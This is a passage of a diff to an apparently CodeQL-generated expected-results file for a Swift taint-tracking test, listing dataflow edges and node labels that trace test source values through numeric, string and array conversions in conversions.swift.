call to sourceInt(_:) | conversions.swift:62:18:62:50 | call to numericCast(_:) | provenance | | +| conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | conversions.swift:66:12:66:12 | v4 | provenance | | +| conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | provenance | | +| conversions.swift:74:11:74:35 | call to abs(_:) | conversions.swift:75:12:75:12 | v7 | provenance | | +| conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:74:11:74:35 | call to abs(_:) | provenance | | +| conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:90:12:90:51 | ...! 
| provenance | | +| conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | provenance | | +| conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | conversions.swift:91:12:91:54 | ...! | provenance | | +| conversions.swift:91:19:91:41 | call to sourceString(_:) | conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | provenance | | +| conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | provenance | | +| conversions.swift:94:33:94:55 | call to sourceUInt64(_:) | conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | provenance | | +| conversions.swift:95:27:95:46 | call to sourceInt(_:) | conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | provenance | | +| conversions.swift:96:30:96:52 | call to sourceUInt64(_:) | conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | provenance | | +| conversions.swift:97:12:97:31 | call to sourceInt(_:) | conversions.swift:97:12:97:33 | .littleEndian | provenance | | +| conversions.swift:98:12:98:34 | call to sourceUInt64(_:) | conversions.swift:98:12:98:36 | .littleEndian | provenance | | +| conversions.swift:99:12:99:31 | call to sourceInt(_:) | conversions.swift:99:12:99:33 | .bigEndian | provenance | | +| conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | provenance | | +| conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | provenance | | +| conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | provenance | | +| conversions.swift:140:12:140:41 | call to String.init(_:) | conversions.swift:140:12:140:43 | .utf8 | provenance | | +| conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:41 | call to 
String.init(_:) | provenance | | +| conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | conversions.swift:141:12:141:43 | call to String.init(_:) | provenance | | +| conversions.swift:142:12:142:43 | call to String.init(_:) | conversions.swift:142:12:142:45 | .utf8 | provenance | | +| conversions.swift:142:19:142:42 | call to sourceFloat80(_:) | conversions.swift:142:12:142:43 | call to String.init(_:) | provenance | | +| conversions.swift:143:19:143:41 | call to sourceDouble(_:) | conversions.swift:143:12:143:42 | call to String.init(_:) | provenance | | +| conversions.swift:144:12:144:42 | call to String.init(_:) | conversions.swift:144:12:144:44 | .utf8 | provenance | | +| conversions.swift:144:19:144:41 | call to sourceDouble(_:) | conversions.swift:144:12:144:42 | call to String.init(_:) | provenance | | +| conversions.swift:146:18:146:39 | call to sourceFloat(_:) | conversions.swift:146:12:146:40 | call to Float.init(_:) | provenance | | +| conversions.swift:147:41:147:60 | call to sourceInt(_:) | conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:148:57:148:78 | call to sourceFloat(_:) | conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:150:44:150:65 | call to sourceFloat(_:) | conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | provenance | | +| conversions.swift:152:12:152:33 | call to sourceFloat(_:) | conversions.swift:152:12:152:35 | .exponent | provenance | | +| conversions.swift:153:12:153:33 | call to sourceFloat(_:) | conversions.swift:153:12:153:35 | .significand | provenance | | +| conversions.swift:154:12:154:35 | call to sourceFloat80(_:) | conversions.swift:154:12:154:37 | .exponent | provenance | | +| conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | provenance | | +| conversions.swift:156:12:156:34 | call to 
sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | provenance | | +| conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | provenance | | +| conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:175:12:175:12 | ms2 | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:176:12:176:16 | .description | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:177:12:177:16 | .debugDescription | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | conversions.swift:174:12:174:46 | ...! | provenance | | +| conversions.swift:174:12:174:46 | ...! | conversions.swift:175:12:175:12 | ms2 | provenance | | +| conversions.swift:174:12:174:46 | ...! | conversions.swift:176:12:176:16 | .description | provenance | | +| conversions.swift:174:12:174:46 | ...! 
| conversions.swift:177:12:177:16 | .debugDescription | provenance | | +| conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) | provenance | | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:183:12:183:12 | parent | provenance | | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:184:12:184:12 | parent | provenance | | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:186:40:186:40 | parent | provenance | | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:187:12:187:12 | v3 | provenance | | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:188:12:188:12 | v3 | provenance | | +| conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:208:25:208:25 | arr1 | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:215:31:215:31 | arr1 | provenance | | +| conversions.swift:202:14:202:33 | [...] [Collection element] | conversions.swift:204:13:204:13 | arr2 | provenance | | +| conversions.swift:202:14:202:33 | [...] [Collection element] | conversions.swift:206:13:206:13 | arr2 [Collection element] | provenance | | +| conversions.swift:202:14:202:33 | [...] [Collection element] | conversions.swift:209:25:209:25 | arr2 [Collection element] | provenance | | +| conversions.swift:202:14:202:33 | [...] 
[Collection element] | conversions.swift:216:31:216:31 | arr2 [Collection element] | provenance | | +| conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:202:14:202:33 | [...] [Collection element] | provenance | | +| conversions.swift:206:13:206:13 | arr2 [Collection element] | conversions.swift:206:13:206:19 | ...[...] | provenance | | +| conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | conversions.swift:210:13:210:13 | arr1b | provenance | | +| conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | conversions.swift:212:13:212:13 | arr1b [Collection element] | provenance | | +| conversions.swift:208:25:208:25 | arr1 | conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | conversions.swift:211:13:211:13 | arr2b | provenance | | +| conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | conversions.swift:213:13:213:13 | arr2b [Collection element] | provenance | | +| conversions.swift:209:25:209:25 | arr2 [Collection element] | conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:212:13:212:13 | arr1b [Collection element] | conversions.swift:212:13:212:20 | ...[...] | provenance | | +| conversions.swift:213:13:213:13 | arr2b [Collection element] | conversions.swift:213:13:213:20 | ...[...] 
| provenance | | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:217:13:217:13 | arr1c | provenance | | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:219:13:219:13 | arr1c [Collection element] | provenance | | +| conversions.swift:215:31:215:31 | arr1 | conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:218:13:218:13 | arr2c | provenance | | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:220:13:220:13 | arr2c [Collection element] | provenance | | +| conversions.swift:216:31:216:31 | arr2 [Collection element] | conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | +| conversions.swift:219:13:219:13 | arr1c [Collection element] | conversions.swift:219:13:219:20 | ...[...] | provenance | | +| conversions.swift:220:13:220:13 | arr2c [Collection element] | conversions.swift:220:13:220:20 | ...[...] 
| provenance | | +| conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | self [v] | provenance | | +| conversions.swift:229:7:229:12 | v | conversions.swift:230:12:230:12 | v | provenance | | +| conversions.swift:230:3:230:3 | [post] self [v] | conversions.swift:229:2:231:2 | self[return] [v] | provenance | | +| conversions.swift:230:12:230:12 | v | conversions.swift:230:3:230:3 | [post] self [v] | provenance | | +| conversions.swift:235:7:235:17 | withUInt | conversions.swift:236:13:236:13 | withUInt | provenance | | +| conversions.swift:241:7:241:20 | withMyValue [v] | conversions.swift:242:13:242:13 | withMyValue [v] | provenance | | +| conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:242:13:242:25 | .v | provenance | | +| conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:248:13:248:13 | withMyValue2 [v] | provenance | | +| conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:249:11:249:11 | withMyValue2 [v] | provenance | | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | conversions.swift:248:13:248:26 | .v | provenance | | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:249:11:249:24 | .v | provenance | | +| conversions.swift:249:11:249:24 | .v | conversions.swift:247:2:252:2 | self[return] | provenance | | +| conversions.swift:249:11:249:24 | .v | conversions.swift:251:12:251:12 | self | provenance | | +| conversions.swift:254:20:254:33 | withMyValue [v] | conversions.swift:255:13:255:13 | withMyValue [v] | provenance | | +| conversions.swift:254:20:254:33 | withMyValue [v] | conversions.swift:256:10:256:10 | withMyValue [v] | 
provenance | | +| conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:255:13:255:25 | .v | provenance | | +| conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:256:10:256:22 | .v | provenance | | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:235:7:235:17 | withUInt | provenance | | +| conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | conversions.swift:241:7:241:20 | withMyValue [v] | provenance | | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:247:7:247:21 | withMyValue2 [v] | provenance | | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | provenance | | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | conversions.swift:254:20:254:33 | withMyValue [v] | provenance | | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | provenance | | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:271:35:271:60 | 
call to MyValue.init(_:) [v] | provenance | | | file://:0:0:0:0 | [post] self [first] | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | provenance | | | file://:0:0:0:0 | [post] self [second] | stringinterpolation.swift:7:6:7:6 | self [Return] [second] | provenance | | | file://:0:0:0:0 | self [first] | file://:0:0:0:0 | .first | provenance | | 
@@ -210,166 +217,179 @@ edges | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes | conversions.swift:32:12:32:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:35:12:35:38 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:35:18:35:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:36:12:36:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:36:19:36:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:37:12:37:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:37:12:37:41 | .utf8 | semmle.label | .utf8 | -| conversions.swift:37:19:37:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:39:12:39:39 | [...] [Collection element] | semmle.label | [...] [Collection element] | -| conversions.swift:39:19:39:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:40:12:40:12 | arr | semmle.label | arr | -| conversions.swift:41:12:41:12 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:41:12:41:17 | ...[...] | semmle.label | ...[...] | -| conversions.swift:42:12:42:23 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | -| conversions.swift:42:20:42:20 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:43:12:43:26 | ...[...] | semmle.label | ...[...] 
| -| conversions.swift:43:20:43:20 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:44:12:44:48 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | -| conversions.swift:44:20:44:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:44:20:44:44 | .utf8 | semmle.label | .utf8 | -| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:45:12:45:51 | ...[...] | semmle.label | ...[...] | -| conversions.swift:45:20:45:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:45:20:45:44 | .utf8 | semmle.label | .utf8 | -| conversions.swift:47:13:47:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:48:13:48:13 | v | semmle.label | v | -| conversions.swift:51:18:51:50 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | -| conversions.swift:51:30:51:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:52:12:52:12 | v2 | semmle.label | v2 | -| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | -| conversions.swift:54:31:54:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:55:12:55:12 | v4 | semmle.label | v4 | -| conversions.swift:63:11:63:35 | call to abs(_:) | semmle.label | call to abs(_:) | -| conversions.swift:63:15:63:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:64:12:64:12 | v7 | semmle.label | v7 | -| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | -| conversions.swift:75:12:75:51 | ...! | semmle.label | ...! 
| -| conversions.swift:75:16:75:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | -| conversions.swift:77:30:77:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | -| conversions.swift:78:27:78:46 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:79:12:79:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:79:12:79:33 | .littleEndian | semmle.label | .littleEndian | -| conversions.swift:80:12:80:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:80:12:80:33 | .bigEndian | semmle.label | .bigEndian | -| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:109:12:109:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:111:12:111:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:112:12:112:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:112:12:112:43 | .utf8 | semmle.label | .utf8 | -| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:113:12:113:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:114:12:114:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | 
-| conversions.swift:114:12:114:45 | .utf8 | semmle.label | .utf8 | -| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:115:12:115:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:116:12:116:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:116:12:116:44 | .utf8 | semmle.label | .utf8 | -| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:118:12:118:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:119:41:119:60 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:124:12:124:35 | .exponent | semmle.label | .exponent | -| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:125:12:125:35 | .significand | semmle.label | .significand | -| 
conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:126:12:126:37 | .exponent | semmle.label | .exponent | -| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:127:12:127:37 | .significand | semmle.label | .significand | -| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:128:12:128:36 | .exponent | semmle.label | .exponent | -| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:129:12:129:36 | .significand | semmle.label | .significand | -| conversions.swift:135:12:135:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:136:12:136:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:136:19:136:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | -| conversions.swift:144:12:144:46 | ...! | semmle.label | ...! 
| -| conversions.swift:144:21:144:44 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:145:12:145:12 | ms2 | semmle.label | ms2 | -| conversions.swift:146:12:146:16 | .description | semmle.label | .description | -| conversions.swift:147:12:147:16 | .debugDescription | semmle.label | .debugDescription | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:153:12:153:12 | parent | semmle.label | parent | -| conversions.swift:154:12:154:12 | parent | semmle.label | parent | -| conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | semmle.label | call to unsafeDowncast(_:to:) | -| conversions.swift:156:40:156:40 | parent | semmle.label | parent | -| conversions.swift:157:12:157:12 | v3 | semmle.label | v3 | -| conversions.swift:158:12:158:12 | v3 | semmle.label | v3 | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | -| conversions.swift:172:14:172:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | -| conversions.swift:172:15:172:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:173:13:173:13 | arr1 | semmle.label | arr1 | -| conversions.swift:174:13:174:13 | arr2 | semmle.label | arr2 | -| conversions.swift:175:13:175:19 | ...[...] | semmle.label | ...[...] | -| conversions.swift:176:13:176:13 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | -| conversions.swift:176:13:176:19 | ...[...] | semmle.label | ...[...] 
| -| conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:178:25:178:25 | arr1 | semmle.label | arr1 | -| conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:179:25:179:25 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | -| conversions.swift:180:13:180:13 | arr1b | semmle.label | arr1b | -| conversions.swift:181:13:181:13 | arr2b | semmle.label | arr2b | -| conversions.swift:182:13:182:13 | arr1b [Collection element] | semmle.label | arr1b [Collection element] | -| conversions.swift:182:13:182:20 | ...[...] | semmle.label | ...[...] | -| conversions.swift:183:13:183:13 | arr2b [Collection element] | semmle.label | arr2b [Collection element] | -| conversions.swift:183:13:183:20 | ...[...] | semmle.label | ...[...] | -| conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | -| conversions.swift:185:31:185:31 | arr1 | semmle.label | arr1 | -| conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | -| conversions.swift:186:31:186:31 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | -| conversions.swift:187:13:187:13 | arr1c | semmle.label | arr1c | -| conversions.swift:188:13:188:13 | arr2c | semmle.label | arr2c | -| conversions.swift:189:13:189:13 | arr1c [Collection element] | semmle.label | arr1c [Collection element] | -| conversions.swift:189:13:189:20 | ...[...] | semmle.label | ...[...] | -| conversions.swift:190:13:190:13 | arr2c [Collection element] | semmle.label | arr2c [Collection element] | -| conversions.swift:190:13:190:20 | ...[...] | semmle.label | ...[...] 
| -| conversions.swift:197:6:197:6 | self [v] | semmle.label | self [v] | -| conversions.swift:199:2:201:2 | self[return] [v] | semmle.label | self[return] [v] | -| conversions.swift:199:7:199:12 | v | semmle.label | v | -| conversions.swift:200:3:200:3 | [post] self [v] | semmle.label | [post] self [v] | -| conversions.swift:200:12:200:12 | v | semmle.label | v | -| conversions.swift:205:7:205:17 | withUInt | semmle.label | withUInt | -| conversions.swift:206:13:206:13 | withUInt | semmle.label | withUInt | -| conversions.swift:211:7:211:20 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:212:13:212:13 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:212:13:212:25 | .v | semmle.label | .v | -| conversions.swift:217:2:222:2 | self[return] | semmle.label | self[return] | -| conversions.swift:217:7:217:21 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | -| conversions.swift:218:13:218:13 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | -| conversions.swift:218:13:218:26 | .v | semmle.label | .v | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | semmle.label | withMyValue2 [v] | -| conversions.swift:219:11:219:24 | .v | semmle.label | .v | -| conversions.swift:221:12:221:12 | self | semmle.label | self | -| conversions.swift:224:20:224:33 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:225:13:225:13 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:225:13:225:25 | .v | semmle.label | .v | -| conversions.swift:226:10:226:10 | withMyValue [v] | semmle.label | withMyValue [v] | -| conversions.swift:226:10:226:22 | .v | semmle.label | .v | -| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | semmle.label | call to sourceUInt(_:) | -| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| 
conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | semmle.label | call to Int.init(withMyValue2:) | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | semmle.label | call to mkInt(withMyValue:) | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | semmle.label | call to MyValue.init(_:) [v] | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:45:12:45:39 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | +| conversions.swift:45:18:45:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:46:12:46:40 | call to Double.init(_:) | semmle.label | call to Double.init(_:) | +| conversions.swift:46:19:46:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:47:12:47:40 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:47:19:47:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:48:12:48:40 | call to String.init(_:) | semmle.label | call to String.init(_:) | +| conversions.swift:48:12:48:42 | .utf8 | semmle.label | .utf8 | +| conversions.swift:48:19:48:39 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:50:12:50:39 | [...] [Collection element] | semmle.label | [...] [Collection element] | +| conversions.swift:50:19:50:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | +| conversions.swift:51:12:51:12 | arr | semmle.label | arr | +| conversions.swift:52:12:52:12 | arr [Collection element] | semmle.label | arr [Collection element] | +| conversions.swift:52:12:52:17 | ...[...] | semmle.label | ...[...] 
| +| conversions.swift:53:12:53:23 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | +| conversions.swift:53:20:53:20 | arr [Collection element] | semmle.label | arr [Collection element] | +| conversions.swift:54:12:54:23 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:54:12:54:26 | ...[...] | semmle.label | ...[...] | +| conversions.swift:54:20:54:20 | arr [Collection element] | semmle.label | arr [Collection element] | +| conversions.swift:55:12:55:48 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | +| conversions.swift:55:20:55:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | +| conversions.swift:55:20:55:44 | .utf8 | semmle.label | .utf8 | +| conversions.swift:56:12:56:48 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | +| conversions.swift:56:12:56:51 | ...[...] | semmle.label | ...[...] 
